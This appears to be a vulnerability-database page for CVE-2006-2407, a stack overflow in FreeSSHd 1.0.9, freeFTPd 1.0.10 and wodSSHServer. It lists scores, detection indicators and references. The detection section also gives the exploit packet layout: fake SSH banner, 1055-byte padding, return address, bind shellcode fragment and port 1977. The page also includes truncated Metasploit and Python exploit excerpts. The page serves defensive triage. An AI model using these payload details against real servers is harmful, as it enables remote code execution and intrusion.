CVE-2006-2407
published 2006-05-16CVE-2006-2407: Stack-based buffer overflow in (1) WeOnlyDo wodSSHServer ActiveX Component 1.2.7 and 1.3.3 DEMO, as used in other products including (2) FreeSSHd 1.0.9 and (3)…
PriorityP262high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
71.38%
99.3th percentile
Stack-based buffer overflow in (1) WeOnlyDo wodSSHServer ActiveX Component 1.2.7 and 1.3.3 DEMO, as used in other products including (2) FreeSSHd 1.0.9 and (3) freeFTPd 1.0.10, allows remote attackers to execute arbitrary code via a long key exchange algorithm string.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freeftpd | freeftpd | — | — |
| freesshd | freesshd | — | — |
| weonlydo | wodsshserver | — | — |
| weonlydo | wodsshserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
SSH-2.0-OpenSSH_3.9p1\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde + 1055 bytes + ret + payload + 19000 bytes + \r\n
bytes↗
\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde + A*1055 + eip + yyyy + \x90*4 + shellcode + B*19021 + \r\n
bytes↗
win32_bind shellcode: \xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24...
- →Exploit sends a fake SSH banner 'SSH-2.0-OpenSSH_3.9p1' followed by a malformed key exchange algorithm string of ~1055+ bytes on TCP port 22; detect oversized SSH_MSG_KEXINIT packets from clients claiming to be OpenSSH_3.9p1. ↗
- →Vulnerable servers respond with SSH banner matching 'SSH-2.0-WeOnlyDo-wodFTPD 2.1.8.98' (freeFTPd) or 'SSH-2.0-WeOnlyDo 1.2.7' (freeSSHd); use these banners to fingerprint exposed vulnerable services. ↗
- →Successful exploitation opens a bind shell on TCP port 1977 on the victim; monitor for unexpected listening services on this port following SSH connection attempts. ↗
- →The exploit payload contains the fixed byte sequence \x00\x00\x4f\x04\x05\x14 immediately after the SSH banner newline; this can be used as a network signature within the first ~50 bytes of the client SSH handshake. ↗
- →The overflow requires exactly 1055 bytes of padding before the return address; an SSH client sending a key exchange algorithm name field exceeding ~1055 bytes is a strong indicator of exploitation. ↗
- ·The Metasploit module only attempts exploitation if the server banner matches the specific vulnerable version strings; non-matching banners cause the module to abort without sending the overflow payload. ↗
- ·Return addresses (RET values) are hardcoded per OS/SP target; the exploit will fail or crash the service if the wrong target is selected, meaning detection based on crash events should account for failed attempts. ↗
- ·The standalone Python PoC (exploit-db 1787) notes that the shell may not be obtained on the first attempt and recommends retrying; detection logic should account for repeated connection attempts from the same source IP to port 22. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2006-2407 freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
---
##
# $Id: freeftpd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',
'Description' => %q{
This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10
This flaw is due to a buffer overflow error when handling a specially
crafted key exchange algorithm string received from an SSH client.
This module is based on MC's freesshd_key_exchange expl
Exploit-DB
freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2006-2407 freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
---
##
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
'Description' => %q{
This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.
This flaw is due to a buffer overflow error when handling a specially
crafted key exchange algorithm string received from an SSH client.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version'
Exploit-DB
freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow
exploitdb·2006-05-15
CVE-2006-2407 freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow
freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow
---
#!/usr/bin/env python
"""
Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
ahmadtauqeer[at]yahoo.com
Disclaimer: This Proof of concept exploit is for educational purpose only.
Please do not use it against any system without prior permission.
You are responsible for yourself for what you do with this code.
Greetings: All the Pakistani White Hats including me ;)
Flames: To all the skript kiddies out there. Man grow up!.
Code tasted against freeSSHd version 1.0.9
If you didn't get shell at first try, try few times and you will get lucky
Advisories:
https://www.securityfocus.com/bid/17958
http://www.frsirt.com/english/advisories/2006/1786
"""
import socket
import getopt
import sys
host = "192.168.0.2"
port = 0
eip =""
#/* win32_bi
Metasploit
FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
metasploit
FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10 This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This module is based on MC's freesshd_key_exchange exploit.
Metasploit
FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
metasploit
FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client.
No writeups or analysis indexed.
http://marc.info/?l=full-disclosure&m=114764338702488&w=2http://secunia.com/advisories/19845http://secunia.com/advisories/19846http://secunia.com/advisories/20136http://securityreason.com/securityalert/901http://www.kb.cert.org/vuls/id/477960http://www.osvdb.org/25463http://www.osvdb.org/25569http://www.securityfocus.com/archive/1/434007/100/0/threadedhttp://www.securityfocus.com/archive/1/434038/100/0/threadedhttp://www.securityfocus.com/archive/1/434402/100/0/threadedhttp://www.securityfocus.com/archive/1/434415/100/0/threadedhttp://www.securityfocus.com/archive/1/434415/30/4920/threadedhttp://www.securityfocus.com/bid/17958http://www.vupen.com/english/advisories/2006/1785http://www.vupen.com/english/advisories/2006/1786http://www.vupen.com/english/advisories/2006/1842https://exchange.xforce.ibmcloud.com/vulnerabilities/26442http://marc.info/?l=full-disclosure&m=114764338702488&w=2http://secunia.com/advisories/19845http://secunia.com/advisories/19846http://secunia.com/advisories/20136http://securityreason.com/securityalert/901http://www.kb.cert.org/vuls/id/477960http://www.osvdb.org/25463http://www.osvdb.org/25569http://www.securityfocus.com/archive/1/434007/100/0/threadedhttp://www.securityfocus.com/archive/1/434038/100/0/threadedhttp://www.securityfocus.com/archive/1/434402/100/0/threadedhttp://www.securityfocus.com/archive/1/434415/100/0/threadedhttp://www.securityfocus.com/archive/1/434415/30/4920/threadedhttp://www.securityfocus.com/bid/17958http://www.vupen.com/english/advisories/2006/1785http://www.vupen.com/english/advisories/2006/1786http://www.vupen.com/english/advisories/2006/1842https://exchange.xforce.ibmcloud.com/vulnerabilities/26442
2006-05-16
Published